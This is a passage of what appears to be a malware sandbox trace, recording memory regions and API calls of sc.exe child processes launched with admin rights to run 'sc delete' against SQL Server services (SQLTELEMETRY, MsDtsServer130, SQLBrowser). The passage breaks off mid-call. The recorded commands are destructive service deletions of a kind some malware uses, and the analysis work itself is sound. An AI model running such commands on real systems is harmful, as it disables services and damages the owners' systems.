entry_point = 0x0 region_type = private name = "private_0x0000003f73320000" filename = "" Region: id = 463 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 464 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3741 start_va = 0x3f73150000 end_va = 0x3f7315ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003f73150000" filename = "" Region: id = 3742 start_va = 0x3f73160000 end_va = 0x3f73166fff entry_point = 0x0 region_type = private name = "private_0x0000003f73160000" filename = "" Region: id = 3743 start_va = 0x3f73240000 end_va = 0x3f732fdfff entry_point = 0x3f73240000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3744 start_va = 0x3f73420000 end_va = 0x3f7349ffff entry_point = 0x0 region_type = private name = "private_0x0000003f73420000" filename = "" Region: id = 3745 start_va = 0x3f735c0000 end_va = 0x3f735cffff entry_point = 0x0 region_type = private name = "private_0x0000003f735c0000" filename = "" Region: id = 3746 start_va = 0x7ff67a5b0000 end_va = 0x7ff67a6affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a5b0000" filename = "" Region: id = 3747 start_va = 0x7ff67a6db000 end_va = 0x7ff67a6dcfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a6db000" filename = "" Region: id = 3748 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3749 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3849 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3850 start_va = 0x3f73300000 end_va = 0x3f73306fff entry_point = 0x0 region_type = private name = "private_0x0000003f73300000" filename = "" Region: id = 3851 start_va = 0x3f734a0000 end_va = 0x3f7357efff entry_point = 0x3f734a0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 3853 start_va = 0x3f73580000 end_va = 0x3f73591fff entry_point = 0x3f73580000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 16 os_tid = 0x778 [0065.281] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0065.281] __set_app_type (_Type=0x1) [0065.281] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0065.281] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0065.281] SetThreadUILanguage (LangId=0x0) returned 0x409 [0065.669] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0065.669] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0065.669] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0065.669] _wcsicmp (_String1="delete", _String2="query") returned -13 [0065.669] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0065.670] _wcsicmp (_String1="delete", _String2="start") returned -15 [0065.670] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0065.670] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0065.670] _wcsicmp (_String1="delete", _String2="control") returned 1 [0065.670] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0065.670] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0065.670] _wcsicmp (_String1="delete", _String2="config") returned 1 [0065.670] _wcsicmp (_String1="delete", _String2="description") returned -7 [0065.670] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0065.670] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0065.670] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0065.670] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0065.670] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0065.670] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0065.670] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0065.670] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0065.670] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0065.670] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0065.670] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0065.670] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0065.670] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0065.670] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0065.670] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0065.670] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0065.670] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0065.670] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0065.670] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0065.670] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0065.670] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0065.670] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0065.672] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x3f73328e00 [0065.677] OpenServiceW (hSCManager=0x3f73328e00, lpServiceName="SQLBrowser", dwDesiredAccess=0x10000) returned 0x0 [0065.677] GetLastError () returned 0x424 [0065.678] _ultow (in: _Dest=0x424, _Radix=1931541112 | out: _Dest=0x424) returned="1060" [0065.678] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0065.800] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x3f7320fa30, nSize=0x2, Arguments=0x3f7320fa60 | out: lpBuffer="鎰猲?") returned 0x62 [0065.821] GetFileType (hFile=0x24) returned 0x2 [0065.821] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x3f7320f9e0 | out: lpMode=0x3f7320f9e0) returned 1 [0066.065] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x3f733293b0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x3f7320f9d8, lpReserved=0x0 | out: lpBuffer=0x3f733293b0*, lpNumberOfCharsWritten=0x3f7320f9d8*=0x62) returned 1 [0066.274] LocalFree (hMem=0x3f733293b0) returned 0x0 [0066.274] LocalFree (hMem=0x0) returned 0x0 [0066.274] CloseServiceHandle (hSCObject=0x3f73328e00) returned 1 [0066.274] LocalFree (hMem=0x0) returned 0x0 [0066.274] exit (_Code=1060) Thread: id = 247 os_tid = 0x10e0 Process: id = "16" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xe2dc000" os_pid = "0x38c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"SQLTELEMETRY\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 377 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 378 start_va = 0x545160000 end_va = 0x54517ffff entry_point = 0x0 region_type = private name = "private_0x0000000545160000" filename = "" Region: id = 379 start_va = 0x545180000 end_va = 0x545193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000545180000" filename = "" Region: id = 380 start_va = 0x5451a0000 end_va = 0x54521ffff entry_point = 0x0 region_type = private name = "private_0x00000005451a0000" filename = "" Region: id = 381 start_va = 0x545220000 end_va = 0x545223fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000545220000" filename = "" Region: id = 382 start_va = 0x545230000 end_va = 0x545230fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000545230000" filename = "" Region: id = 383 start_va = 0x545240000 end_va = 0x545241fff entry_point = 0x0 region_type = private name = "private_0x0000000545240000" filename = "" Region: id = 384 start_va = 0x7df5ffa30000 end_va = 0x7ff5ffa2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffa30000" filename = "" Region: id = 385 start_va = 0x7ff67ab20000 end_va = 0x7ff67ab42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67ab20000" filename = "" Region: id = 386 start_va = 0x7ff67ab4d000 end_va = 0x7ff67ab4efff entry_point = 0x0 region_type = private name = "private_0x00007ff67ab4d000" filename = "" Region: id = 387 start_va = 0x7ff67ab4f000 end_va = 0x7ff67ab4ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67ab4f000" filename = "" Region: id = 388 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 389 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 465 start_va = 0x545340000 end_va = 0x54543ffff entry_point = 0x0 region_type = private name = "private_0x0000000545340000" filename = "" Region: id = 466 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 467 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4418 start_va = 0x545160000 end_va = 0x54516ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000545160000" filename = "" Region: id = 4419 start_va = 0x545170000 end_va = 0x545176fff entry_point = 0x0 region_type = private name = "private_0x0000000545170000" filename = "" Region: id = 4420 start_va = 0x545250000 end_va = 0x54530dfff entry_point = 0x545250000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4421 start_va = 0x545440000 end_va = 0x5454bffff entry_point = 0x0 region_type = private name = "private_0x0000000545440000" filename = "" Region: id = 4422 start_va = 0x545580000 end_va = 0x54558ffff entry_point = 0x0 region_type = private name = "private_0x0000000545580000" filename = "" Region: id = 4423 start_va = 0x7ff67aa20000 end_va = 0x7ff67ab1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67aa20000" filename = "" Region: id = 4424 start_va = 0x7ff67ab4b000 end_va = 0x7ff67ab4cfff entry_point = 0x0 region_type = private name = "private_0x00007ff67ab4b000" filename = "" Region: id = 4425 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4426 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4465 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4466 start_va = 0x545310000 end_va = 0x545316fff entry_point = 0x0 region_type = private name = "private_0x0000000545310000" filename = "" Region: id = 4467 start_va = 0x545590000 end_va = 0x54566efff entry_point = 0x545590000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 4468 start_va = 0x545320000 end_va = 0x545331fff entry_point = 0x545320000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 17 os_tid = 0x544 [0070.320] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0070.320] __set_app_type (_Type=0x1) [0070.320] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0070.320] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0070.320] SetThreadUILanguage (LangId=0x0) returned 0x409 [0070.530] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0070.530] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0070.530] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0070.530] _wcsicmp (_String1="delete", _String2="query") returned -13 [0070.530] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0070.530] _wcsicmp (_String1="delete", _String2="start") returned -15 [0070.530] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0070.530] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0070.530] _wcsicmp (_String1="delete", _String2="control") returned 1 [0070.530] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0070.530] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0070.530] _wcsicmp (_String1="delete", _String2="config") returned 1 [0070.530] _wcsicmp (_String1="delete", _String2="description") returned -7 [0070.530] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0070.530] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0070.530] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0070.530] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0070.530] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0070.530] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0070.530] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0070.530] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0070.530] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0070.530] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0070.530] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0070.530] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0070.530] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0070.530] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0070.530] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0070.530] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0070.530] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0070.530] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0070.530] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0070.530] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0070.530] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0070.530] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0070.532] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x5453489e0 [0070.537] OpenServiceW (hSCManager=0x5453489e0, lpServiceName="SQLTELEMETRY", dwDesiredAccess=0x10000) returned 0x0 [0070.537] GetLastError () returned 0x424 [0070.538] _ultow (in: _Dest=0x424, _Radix=1159855416 | out: _Dest=0x424) returned="1060" [0070.538] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0070.539] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x54521fcf0, nSize=0x2, Arguments=0x54521fd20 | out: lpBuffer="頰䔴\x05") returned 0x62 [0070.540] GetFileType (hFile=0x24) returned 0x2 [0070.540] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x54521fca0 | out: lpMode=0x54521fca0) returned 1 [0070.761] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x545349830*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x54521fc98, lpReserved=0x0 | out: lpBuffer=0x545349830*, lpNumberOfCharsWritten=0x54521fc98*=0x62) returned 1 [0070.762] LocalFree (hMem=0x545349830) returned 0x0 [0070.762] LocalFree (hMem=0x0) returned 0x0 [0070.762] CloseServiceHandle (hSCObject=0x5453489e0) returned 1 [0070.762] LocalFree (hMem=0x0) returned 0x0 [0070.762] exit (_Code=1060) Thread: id = 295 os_tid = 0x11cc Process: id = "17" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xe3a1000" os_pid = "0x274" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"MsDtsServer130\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 390 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 391 start_va = 0xbcfaa00000 end_va = 0xbcfaa1ffff entry_point = 0x0 region_type = private name = "private_0x000000bcfaa00000" filename = "" Region: id = 392 start_va = 0xbcfaa20000 end_va = 0xbcfaa33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bcfaa20000" filename = "" Region: id = 393 start_va = 0xbcfaa40000 end_va = 0xbcfaabffff entry_point = 0x0 region_type = private name = "private_0x000000bcfaa40000" filename = "" Region: id = 394 start_va = 0xbcfaac0000 end_va = 0xbcfaac3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bcfaac0000" filename = "" Region: id = 395 start_va = 0xbcfaad0000 end_va = 0xbcfaad0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bcfaad0000" filename = "" Region: id = 396 start_va = 0xbcfaae0000 end_va = 0xbcfaae1fff entry_point = 0x0 region_type = private name = "private_0x000000bcfaae0000" filename = "" Region: id = 397 start_va = 0x7df5fff50000 end_va = 0x7ff5fff4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fff50000" filename = "" Region: id = 398 start_va = 0x7ff67a330000 end_va = 0x7ff67a352fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a330000" filename = "" Region: id = 399 start_va = 0x7ff67a35c000 end_va = 0x7ff67a35cfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a35c000" filename = "" Region: id = 400 start_va = 0x7ff67a35e000 end_va = 0x7ff67a35ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67a35e000" filename = "" Region: id = 401 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 402 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 468 start_va = 0xbcfab80000 end_va = 0xbcfac7ffff entry_point = 0x0 region_type = private name = "private_0x000000bcfab80000" filename = "" Region: id = 469 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 470 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4941 start_va = 0xbcfaa00000 end_va = 0xbcfaa0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bcfaa00000" filename = "" Region: id = 4942 start_va = 0xbcfaa10000 end_va = 0xbcfaa16fff entry_point = 0x0 region_type = private name = "private_0x000000bcfaa10000" filename = "" Region: id = 4943 start_va = 0xbcfaaf0000 end_va = 0xbcfab6ffff entry_point = 0x0 region_type = private name = "private_0x000000bcfaaf0000" filename = "" Region: id = 4944 start_va = 0xbcfac80000 end_va = 0xbcfad3dfff entry_point = 0xbcfac80000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4945 start_va = 0xbcfaf20000 end_va = 0xbcfaf2ffff entry_point = 0x0 region_type = private name = "private_0x000000bcfaf20000" filename = "" Region: id = 4946 start_va = 0x7ff67a230000 end_va = 0x7ff67a32ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a230000" filename = "" Region: id = 4947 start_va = 0x7ff67a35a000 end_va = 0x7ff67a35bfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a35a000" filename = "" Region: id = 4948 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4949 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4958 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4959 start_va = 0xbcfab70000 end_va = 0xbcfab76fff entry_point = 0x0 region_type = private name = "private_0x000000bcfab70000" filename = "" Region: id = 4960 start_va = 0xbcfad40000 end_va = 0xbcfae1efff entry_point = 0xbcfad40000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 4961 start_va = 0xbcfae20000 end_va = 0xbcfae31fff entry_point = 0xbcfae20000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 18 os_tid = 0x774 [0073.881] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0073.881] __set_app_type (_Type=0x1) [0073.881] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0073.881] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0073.881] SetThreadUILanguage (LangId=0x0) returned 0x409 [0074.032] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0074.032] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0074.032] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0074.032] _wcsicmp (_String1="delete", _String2="query") returned -13 [0074.032] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0074.032] _wcsicmp (_String1="delete", _String2="start") returned -15 [0074.032] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0074.032] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0074.032] _wcsicmp (_String1="delete", _String2="control") returned 1 [0074.032] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0074.032] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0074.032] _wcsicmp (_String1="delete", _String2="config") returned 1 [0074.032] _wcsicmp (_String1="delete", _String2="description") returned -7 [0074.032] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0074.032] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0074.032] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0074.032] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0074.032] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0074.032] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0074.032] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0074.033] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0074.033] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0074.033] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0074.033] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0074.033] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0074.033] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0074.033] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0074.033] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0074.033] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0074.033] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0074.033] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0074.033] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0074.033] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0074.033] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0074.033] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0074.034] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xbcfab889d0 [0074.039] OpenServiceW (hSCManager=0xbcfab889d0, lpServiceName="MsDtsServer130", dwDesiredAccess=0x10000) returned 0x0 [0074.039] GetLastError () returned 0x424 [0074.039] _ultow (in: _Dest=0x424, _Radix=-89392392 | out: _Dest=0x424) returned="1060" [0074.039] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0074.040] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xbcfaabfab0, nSize=0x2, Arguments=0xbcfaabfae0 | out: lpBuffer="顐視¼") returned 0x62 [0074.041] GetFileType (hFile=0x24) returned 0x2 [0074.041] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xbcfaabfa60 | out: lpMode=0xbcfaabfa60) returned 1 [0074.078] WriteConsoleW (in: 